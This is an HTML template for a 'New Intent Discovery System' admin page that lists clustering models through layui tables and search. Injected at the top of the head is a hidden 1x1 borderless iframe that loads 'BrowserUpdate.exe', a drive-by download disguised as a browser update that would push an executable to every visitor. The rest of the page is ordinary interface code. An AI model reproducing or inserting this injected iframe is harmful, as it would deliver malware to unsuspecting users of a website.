<!DOCTYPE html>
<html class="x-admin-sm">

    <head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe>
        <meta charset="UTF-8">
        <title>New Intent Discovery System</title>
        <meta name="renderer" content="webkit">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta name="viewport" content="width=device-width,user-scalable=yes, minimum-scale=0.4, initial-scale=0.8,target-densitydpi=low-dpi" />
        <link rel="stylesheet" href="/static/lib/xadmin/css/font.css">
        <link rel="stylesheet" href="/static/lib/xadmin/css/xadmin.css">
        <script type="text/javascript" src="/static/lib/layui/layui.js" charset="utf-8"></script>
        <script type="text/javascript" src="/static/lib/xadmin/js/xadmin.js"></script>
        <!-- 让IE8/9支持媒体查询，从而兼容栅格 -->
        <!--[if lt IE 9]>
            <script src="https://cdn.staticfile.org/html5shiv/r29/html5.min.js"></script>
            <script src="https://cdn.staticfile.org/respond.js/1.4.2/respond.min.js"></script>
        <![endif]-->
    </head>
    <body>
        <!-- model-list -->
        <div class="layui-fluid">
            <div class="layui-row layui-col-space15">
                <div class="layui-col-md12">
                    <div class="layui-card">
                        <div class="layui-card-body ">
                            <form class="layui-form layui-col-space5">
                                
                                <div class="layui-inline layui-show-xs-block">
                                    
                                    <input  id="model_name_select" name="model_name_select"  style= "border-radius: 5px"  type="text" placeholder="Please input Model Name" value="{{ model_name_select }}" autocomplete="off" class="layui-input">
                                </div>
                                <div class="layui-inline layui-show-xs-block">
                                    <button class="layui-btn layui-btn-warm" id="search" lay-filter="search" lay-submit="" ><i class="layui-icon">&#xe615;</i></button>
                                </div>
                            </form>
                           
                        </div>
                        <div class="layui-card-body ">
                                
                            <div class="layui-card-body ">
                                <table class="layui-table layui-form" id="modelTable" lay-filter="demoEvent" />
                            </div>

                            <script type="text/html" id="barDemo">
                                <a title="Details" lay-event="detail" href="javascript:;">
                                    <i class="iconfont left-nav-li">&#xe724;</i>
                                </a>
                            </script>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <script>layui.use(['form', 'layer','jquery','table'],
            function() {
                $ = layui.jquery;
                var form = layui.form,
                layer = layui.layer;
                table = layui.table;

                var tableIns = table.render({
                    elem: '#modelTable'
                    ,url: '/discovery/model_management/getModelList' //设置异步接口
                    ,page: { //支持传入 laypage 组件的所有参数（某些参数除外，如：jump/elem） - 详见文档
                        layout: ['prev', 'page', 'next' , 'count' ] //自定义分页布局
                        //,curr: 5 //设定初始在第 5 页
                        ,first: 'first'
                        ,last: 'last'
                        
                    }
                    ,cols: [[ //表头
                            {field: 'model_name', title: 'Name' , align: 'center'}
                            ,{field: 'paper_source', title: 'Source', align: 'center' , templet: function(d){

                                if(d.paper_source!=''&d.code_source!=''){return '<a style = "text-decoration: underline ; color :blue;"  href="' + d.paper_source + '" target=_blank>Paper</a> &nbsp &nbsp <a style = "text-decoration: underline ; color :blue;"  href="' + d.code_source + '" target=_blank>Code</a>'}
                                else if(d.paper_source=='' & d.code_source!=''){return '<a style = "text-decoration: underline ; color :blue;"  href="' + d.code_source + '" target=_blank>Code</a>'}
                                else if(d.paper_source!='' & d.code_source==''){return '<a style = "text-decoration: underline ; color :blue;"  href="' + d.paper_source + '" target=_blank>Paper</a>'}

                                }
                                }
                            ,{field: '', title: 'Method Type' , align: 'center' , templet: function(d){
                                if(d.model_name=='CDACPlus'|d.model_name=='DeepAligned' |d.model_name=='DTC_BERT' |d.model_name=='KCL_BERT' |d.model_name=='MCL_BERT'){return 'Semi-supervised clustering'}
                                else  {return 'Unsupervised clustering'}
                                }
                            }
                            ,{field: 'create_time', title: 'Created Time' , align: 'center'}
                            ,{field: 'right', title: 'Detailed Information', align: 'center' , toolbar: '#barDemo' }
                            ]] //设置表头
                    ,id: 'search'
                    ,where: {
                        'model_name_select': $('#model_name_select').val()
                    }
                });

                //监听提交
                form.on('submit(search)',function(data) {
                    
                    tableIns.reload({
                        where: { //设定异步数据接口的额外参数，任意设
                        'model_name_select': $('#model_name_select').val()
                        }
                    ,page: { //支持传入 laypage 组件的所有参数（某些参数除外，如：jump/elem） - 详见文档
                        layout: ['prev', 'page', 'next' , 'count' ] //自定义分页布局
                        ,curr: 1 //设定初始在第 5 页
                        ,first: 'first'
                        ,last: 'last'
                        
                    }
                    });
                    return false;
                });

                //监听单元格事件
                table.on('tool(demoEvent)', function(obj){
                     var data = obj.data;
                    // console.log(data)
                    if(obj.event === 'detail'){
                        xadmin.open('Model Details','/discovery/model_management/details/?model_id='+data.model_id,700,500)
                    }
                });

            });
         
            
        </script>
        <script>var _hmt = _hmt || []; (function() {
                var hm = document.createElement("script");
                hm.src = "https://hm.baidu.com/hm.js?b393d153aeb26b46e9431fabaf0f6190";
                var s = document.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(hm, s);
            })();</script>
    </body>

</html>